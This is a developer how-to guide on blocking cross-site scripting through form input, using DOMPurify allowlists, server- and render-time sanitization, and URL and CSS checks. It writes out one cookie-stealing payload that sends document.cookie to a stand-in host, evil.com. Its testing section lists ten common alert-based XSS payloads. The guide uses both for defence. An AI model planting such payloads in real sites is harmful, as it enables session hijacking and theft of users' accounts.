How to Sanitize User Input

Share
How-To Guide

How to Sanitize User Input

Stop attackers from injecting malicious code through your forms

TL;DR

TL;DR (20 minutes)

Never trust user input. Use DOMPurify to sanitize HTML on both client and server. Define strict allowlists for tags and attributes. Sanitize before storing AND before rendering. Escape output in the right context (HTML, URL, JavaScript).

Prerequisites

  • Node.js 18+ installed
  • A React, Next.js, or Node.js project
  • Basic understanding of XSS vulnerabilities
  • npm or yarn package manager

Why Sanitization Matters

User input is the primary attack vector for XSS (Cross-Site Scripting) attacks. When unsanitized input is rendered in the browser, attackers can inject scripts that steal cookies, redirect users, or modify page content.

Real Attack Example: A user submits <img src=x onerror="fetch('https://evil.com/steal?c='+document.cookie)"> as their "bio". Without sanitization, this steals every visitor's session cookie.

Step-by-Step Guide

1

Install DOMPurify

DOMPurify is the most trusted HTML sanitization library. Install it along with the isomorphic version for server-side use:

# For client-side only
npm install dompurify
npm install @types/dompurify --save-dev

# For server-side (Next.js, Node.js)
npm install isomorphic-dompurify
2

Create a sanitization utility

Create a reusable sanitization module with strict defaults:

// lib/sanitize.ts
import DOMPurify from 'isomorphic-dompurify';

// Strict config for user-generated content
const STRICT_CONFIG = {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p', 'br', 'ul', 'ol', 'li'],
  ALLOWED_ATTR: [],
  ALLOW_DATA_ATTR: false,
};

// Config that allows links (for comments, bios)
const WITH_LINKS_CONFIG = {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p', 'br', 'ul', 'ol', 'li', 'a'],
  ALLOWED_ATTR: ['href'],
  ALLOW_DATA_ATTR: false,
  ADD_ATTR: ['target', 'rel'],
};

export function sanitizeStrict(dirty: string): string {
  return DOMPurify.sanitize(dirty, STRICT_CONFIG);
}

export function sanitizeWithLinks(dirty: string): string {
  const clean = DOMPurify.sanitize(dirty, WITH_LINKS_CONFIG);
  // Force external links to open safely
  return clean.replace(/<a /g, '<a target="_blank" rel="noopener noreferrer" ');
}

export function sanitizePlainText(dirty: string): string {
  // Strip ALL HTML, return plain text only
  return DOMPurify.sanitize(dirty, { ALLOWED_TAGS: [] });
}

export function escapeHtml(str: string): string {
  // For contexts where you need escaped HTML entities
  const map: Record<string, string> = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#039;',
  };
  return str.replace(/[&<>"']/g, m => map[m]);
}
3

Sanitize in your API routes

Always sanitize on the server before storing data:

// app/api/comments/route.ts
import { sanitizeWithLinks, sanitizePlainText } from '@/lib/sanitize';
import { z } from 'zod';

const CommentSchema = z.object({
  content: z.string().min(1).max(5000),
  authorName: z.string().min(1).max(100),
});

export async function POST(request: Request) {
  const body = await request.json();
  const result = CommentSchema.safeParse(body);

  if (!result.success) {
    return Response.json({ error: 'Invalid input' }, { status: 400 });
  }

  // Sanitize before storing
  const sanitizedContent = sanitizeWithLinks(result.data.content);
  const sanitizedName = sanitizePlainText(result.data.authorName);

  const comment = await db.comment.create({
    data: {
      content: sanitizedContent,
      authorName: sanitizedName,
    },
  });

  return Response.json(comment, { status: 201 });
}
4

Sanitize when rendering (defense in depth)

Even if you sanitize on input, sanitize again when rendering. This protects against database compromises or bugs:

// components/Comment.tsx
import DOMPurify from 'dompurify';

interface CommentProps {
  content: string;
  authorName: string;
}

export function Comment({ content, authorName }: CommentProps) {
  // Sanitize again before rendering
  const safeContent = DOMPurify.sanitize(content, {
    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p', 'br', 'a'],
    ALLOWED_ATTR: ['href', 'target', 'rel'],
  });

  return (
    <div className="comment">
      <h4>{authorName}</h4> {/* React escapes this automatically */}
      <div dangerouslySetInnerHTML={{ __html: safeContent }} />
    </div>
  );
}
5

Handle different contexts

Different contexts require different sanitization:

// URL context - validate protocol
function sanitizeUrl(url: string): string {
  try {
    const parsed = new URL(url);
    // Only allow http and https
    if (!['http:', 'https:'].includes(parsed.protocol)) {
      return '#';
    }
    return parsed.href;
  } catch {
    return '#';
  }
}

// Usage
<a href={sanitizeUrl(userProvidedUrl)}>Link</a>

// CSS context - use allowlists
const SAFE_COLORS = ['red', 'blue', 'green', 'purple', 'orange'];
function sanitizeColor(color: string): string {
  return SAFE_COLORS.includes(color.toLowerCase()) ? color : 'gray';
}

// JSON context - validate structure
function sanitizeJsonString(jsonStr: string): object | null {
  try {
    const parsed = JSON.parse(jsonStr);
    // Validate against expected schema
    return MySchema.parse(parsed);
  } catch {
    return null;
  }
}

Security Checklist

  • Sanitize ALL user input, including hidden fields and headers
  • Use allowlists (not blocklists) for HTML tags and attributes
  • Sanitize on the server (primary) AND client (defense in depth)
  • Never use eval(), innerHTML, or template literals with user input
  • Validate URLs before using in href or src attributes
  • Set Content Security Policy headers to block inline scripts
  • Use httpOnly cookies so stolen XSS can't access session tokens
  • Log sanitization events to detect attack attempts

How to Verify It Worked

Test your sanitization with these common XSS payloads:

// Test payloads - none of these should execute
const testPayloads = [
  '<script>alert("XSS")</script>',
  '<img src=x onerror=alert("XSS")>',
  '<svg onload=alert("XSS")>',
  '<a href="javascript:alert(\'XSS\')">click</a>',
  '<div onmouseover="alert(\'XSS\')">hover</div>',
  '<iframe src="javascript:alert(\'XSS\')">',
  '<body onload=alert("XSS")>',
  '<input onfocus=alert("XSS") autofocus>',
  '<marquee onstart=alert("XSS")>',
  '<details open ontoggle=alert("XSS")>',
];

// Automated test
testPayloads.forEach(payload => {
  const sanitized = sanitizeStrict(payload);
  console.log(`Input: ${payload}`);
  console.log(`Output: ${sanitized}`);
  console.log(`Safe: ${!sanitized.includes('onerror') && !sanitized.includes('javascript:')}`);
  console.log('---');
});

Pro Tip: Use browser DevTools to inspect rendered HTML. Right-click the element containing user content and select "Inspect". Verify that no script tags, event handlers, or javascript: URLs are present.

Common Errors and Troubleshooting

Error: DOMPurify is not defined (server-side)

// Problem: Using browser DOMPurify on server
import DOMPurify from 'dompurify'; // Wrong for server

// Solution: Use isomorphic version
import DOMPurify from 'isomorphic-dompurify'; // Works everywhere

Error: Content is completely stripped

// Problem: Overly restrictive config
const config = { ALLOWED_TAGS: [] }; // Strips everything

// Solution: Allow the tags you need
const config = {
  ALLOWED_TAGS: ['p', 'br', 'b', 'i', 'em', 'strong'],
  ALLOWED_ATTR: [],
};
// Problem: href not in allowed attributes
const config = {
  ALLOWED_TAGS: ['a'],
  ALLOWED_ATTR: [], // Missing href!
};

// Solution: Include href in allowed attributes
const config = {
  ALLOWED_TAGS: ['a'],
  ALLOWED_ATTR: ['href'],
};

Error: Sanitization is too slow

// Problem: Sanitizing on every render
function Comment({ content }) {
  // This runs on every render!
  const safe = DOMPurify.sanitize(content);
  return <div dangerouslySetInnerHTML={{ __html: safe }} />;
}

// Solution: Memoize or sanitize once when storing
import { useMemo } from 'react';

function Comment({ content }) {
  const safe = useMemo(() => DOMPurify.sanitize(content), [content]);
  return <div dangerouslySetInnerHTML={{ __html: safe }} />;
}

Frequently Asked Questions

Is React's automatic escaping enough?

React escapes content in JSX expressions like {userInput}, which is safe. But if you use dangerouslySetInnerHTML, render to non-JSX contexts, or interpolate into URLs/attributes, you need explicit sanitization.

Should I sanitize on input or output?

Both. Sanitize on input (before storing) to keep your database clean and reduce storage of malicious content. Sanitize on output (before rendering) as defense in depth in case your database is compromised or a bug bypasses input sanitization.

Why not use a blocklist instead of allowlist?

Blocklists are impossible to maintain. There are hundreds of ways to inject scripts (event handlers, data URLs, obscure tags, encoding tricks). Attackers constantly find new bypasses. Allowlists define exactly what's safe, blocking everything else.

Can I trust input from authenticated users?

No. Authenticated users can still be attackers, or their accounts could be compromised. Always sanitize regardless of authentication status.

How do I sanitize Markdown content?

First convert Markdown to HTML using a library like marked, then sanitize the HTML output with DOMPurify. Never render raw Markdown HTML without sanitization.

How-To Guides

How to Sanitize User Input